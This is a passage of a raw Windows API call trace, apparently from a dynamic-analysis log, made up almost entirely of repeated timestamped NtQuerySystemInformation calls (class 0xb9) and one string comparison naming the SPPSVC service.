SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x28, ResultLength=0x0) [0281.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x28, ResultLength=0x0) [0281.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x28, ResultLength=0x0) [0281.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0281.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0281.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x28, ResultLength=0x0) [0281.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x28, ResultLength=0x0) [0281.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0281.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0281.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x20, ResultLength=0x0) [0281.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7f0, Length=0x20, ResultLength=0x0) [0281.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7f0, Length=0x20, ResultLength=0x0) [0281.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7f0, Length=0x20, ResultLength=0x0) [0281.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0281.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0281.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0281.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0281.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0281.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0281.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0281.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0281.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0281.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0281.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0281.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0281.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0281.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8f0, Length=0x20, ResultLength=0x0) [0281.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8f0, Length=0x20, ResultLength=0x0) [0281.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x50, ResultLength=0x0) [0281.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd80, Length=0x38, ResultLength=0x0) [0281.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x28, ResultLength=0x0) [0281.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x28, ResultLength=0x0) [0281.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x28, ResultLength=0x0) [0281.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x28, ResultLength=0x0) [0281.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x28, ResultLength=0x0) [0281.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd80, Length=0x38, ResultLength=0x0) [0281.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x28, ResultLength=0x0) [0281.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x28, ResultLength=0x0) [0281.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd80, Length=0x38, ResultLength=0x0) [0281.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x20, ResultLength=0x0) [0281.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x20, ResultLength=0x0) [0281.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x20, ResultLength=0x0) [0281.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x20, ResultLength=0x0) [0281.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd80, Length=0x38, ResultLength=0x0) [0281.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x20, ResultLength=0x0) [0281.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb90, Length=0x20, ResultLength=0x0) [0281.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb90, Length=0x20, ResultLength=0x0) [0281.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x50, ResultLength=0x0) [0281.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0281.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0281.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0281.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0281.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0281.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0281.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0281.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0281.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0281.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0281.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0281.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0281.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0281.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0281.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0281.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0281.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0281.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0281.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.806] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0281.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcce8, Length=0x50, ResultLength=0x0) [0281.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x38, ResultLength=0x0) [0281.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x28, ResultLength=0x0) [0281.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x28, ResultLength=0x0) [0281.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x28, ResultLength=0x0) [0281.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x28, ResultLength=0x0) [0281.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x38, ResultLength=0x0) [0281.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x28, ResultLength=0x0) [0281.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x28, ResultLength=0x0) [0281.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x38, ResultLength=0x0) [0281.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x20, ResultLength=0x0) [0281.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0281.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0281.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0281.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x38, ResultLength=0x0) [0281.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x20, ResultLength=0x0) [0281.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x20, ResultLength=0x0) [0281.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x20, ResultLength=0x0) [0281.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.814] NtQuerySystemInformation 